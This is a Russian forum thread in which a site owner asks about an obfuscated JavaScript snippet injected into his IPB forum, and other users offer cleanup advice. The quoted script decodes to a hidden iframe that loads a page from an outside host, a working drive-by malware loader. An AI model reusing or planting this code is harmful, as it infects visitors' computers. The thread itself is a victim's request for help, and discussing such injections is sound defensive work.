Внедрили скрипт в ipb. помогите разобраться.

[Zybenkov]

Сейчас обнаружил в на форуме это :

Цитата:

<script language="JavaScript">function crypo(){var temp="",i,c=0,out="";var str="13&10&60&105&102&114&97&109&101&32&115&114&99 &61&34&104&116&116&112&58&47&47&104&116&99&115&46& 97&120&51&46&110&101&116&47&100&120&116&100&115&47 &103&97&116&101&46&112&104&112&34&32&119&105&100&1 16&104&61&34&49&34&32&104&101&105&103&104&116&61&3 4&49&34&32&102&114&97&109&101&98&111&114&100&101&1 14&61&34&48&34&62&60&47&105&102&114&97&109&101&62& ";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='&')temp=temp+str.charAt(c ++);c++;out=out+String.fromCharCode(temp);temp=""; }document.write(out);}</script>
<script language="JavaScript">crypo();</script>

В админка показала, что внедрили буквально минут 15 назад, я все прибрал, что нашел. Но что это?: пока меняю пароли.

[gid]

это скорее всего код для загрузки вируса всем вашим "незащищенным" посетителям, чистите систему или ищите "шпионов" среди друзей/знакомых, а уж затем меняйте пароли.

ps
советую перейти на ubuntu 9.10, и в большинстве случаев, подобные проблемы Вас не побеспокоят.

[Anadonam]

Zybenkov, браузер ИЕ ?) просто интересно !..)

[Zybenkov]

omg, все сайты на хостинге покоцало, айм фейл

Добавлено через 48 секунд
opera и firefox, иногда осла открывал редко.

[Anadonam]

Zybenkov, да просто смена паролей как таковое не поможет если у тебя троян сидит - а он скорее всего сидит - у меня была такая беда - но моей бедой был ИЕ - пересьтал им пользоваться и всё прошло.. тут хз

то что все сайлы ломанули эт нормально - на твоем компе веть были прописаны все доступы и пароли к ним - вот их и дернули - но это делает не чел руками это прога - троян

на время лечения делай чистые бекапы сайтов - могут сильно пригодиться- шоб не чистить по 100 раз руками всё - пока не надёш дыру !

[Zybenkov]

бекапы есть, сейчас этим занимаюсь. не разу не востанавливал.

Добавлено через 1 час 20 минут
проблема решена с сайтами, но как искать трояна:? dr/wed ничего не видит, сейчас поставил аутпост, в сеть никто не лезет.

[Avom]

да это скорее всего через вашего хостера сделали,если не он сам)

[sitestyler]

Цитата:

Сообщение от gid

советую перейти на ubuntu 9.10, и в большинстве случаев, подобные проблемы Вас не побеспокоят.

Плюс стопицот. Более двух лет стоит убунта и отлично работает. А винда чисто ради опытов на VirtualBox есть.

[zeta]

Цитата:

Сообщение от Zybenkov

внедрили буквально минут 15 назад

- посмотрите по логам с каких ip
- загрузите .ftpaccess в корень, пока не найдете откуда